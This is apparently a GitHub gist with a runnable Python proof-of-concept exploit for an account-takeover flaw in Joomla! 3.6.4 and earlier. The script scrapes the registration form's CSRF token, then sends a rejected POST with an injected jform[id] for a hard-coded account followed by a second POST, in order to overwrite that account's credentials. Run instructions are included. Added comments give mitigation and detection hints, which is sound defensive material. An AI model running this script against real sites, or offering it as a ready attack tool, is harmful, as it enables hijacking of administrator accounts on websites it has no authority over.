@mikimaine
Created January 28, 2017 13:04
Joomla! <= 3.6.4 Admin TakeOver, source 'cx'.
#!/usr/bin/python3
# Joomla! <= 3.6.4 Admin TakeOver
#
# Proof-of-concept against the user-registration flow of the Joomla! release
# range named above. What the code below actually does, for anyone assessing
# exposure: it fetches the public registration form (the author notes this
# includes the CSRF token), POSTs it once with an extra `id` field and
# deliberately mismatched passwords, then POSTs again in the same session
# with matching passwords and without `id`; the final print reports the
# account as modified. The target `id` is hard-coded (ADMIN_ID below).
# Mitigation: run a Joomla! release newer than the range named above.
# Detection idea (hedged -- confirm against an unmodified install, which
# presumably never submits jform[id]): a registration.register POST carrying
# a jform[id] parameter, or a rejected registration immediately followed by an
# accepted one from the same session, is worth alerting on.
#
# Make sure you have python3 on your machine.
# To run the script: change the target url variable,
# then open a terminal
# and in bash run: python3 joomla_take_over.py
# That's it.
import bs4
import requests
import random
# Numeric user id the modified request is aimed at. The name implies an
# administrator account; the account's real role is not visible from here.
ADMIN_ID = 230
url = 'joomla site url' #put the target website url
# Page that serves the registration form (scraped below for its inputs).
form_url = url + 'index.php/component/users/?view=registration'
# Endpoint both POSTs go to.
action_url = url + 'index.php/component/users/?task=registration.register'
# Random suffix so repeated runs do not collide on the same username.
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@maine.com'
password = 'MaineIsToo123'
# Fields that will override / extend the scraped form values. Note the two
# deliberate deviations from a normal registration: `password2` does not
# match `password1` (the first POST is meant to be rejected, see below), and
# `id` names an existing account rather than leaving the server to create one.
user_data = {
'name': username,
'username': username,
'password1': password,
'password2': password + 'XXXinvalid',
'email1': email,
'email2': email,
'id': '%d' % ADMIN_ID
}
# One Session so cookies set by the GET carry over to both POSTs.
session = requests.Session()
# Grab original data from the form, including the CSRF token
response = session.get(form_url)
soup = bs4.BeautifulSoup(response.text, 'lxml')
form = soup.find('form', id='member-registration')
# name -> value for every <input> in the form, hidden ones included.
data = {e['name']: e['value'] for e in form.find_all('input')}
# Build our modified data array
# Re-key the overrides as jform[<field>], which is the key shape the lookups
# further down (jform[password1], jform[password2], jform[id]) rely on.
user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
data.update(user_data)
# First request will get denied because the two passwords are mismatched
response = session.post(action_url, data=data)
# The second will work
# Only two fields change between the POSTs: the passwords now match and the
# `id` field is dropped. Everything else, including the CSRF token, is resent.
data['jform[password2]'] = data['jform[password1]']
del data['jform[id]']
response = session.post(action_url, data=data)
# Neither response is inspected; the message is printed regardless of outcome.
print("Account modified to user: %s [%s]" % (username, email))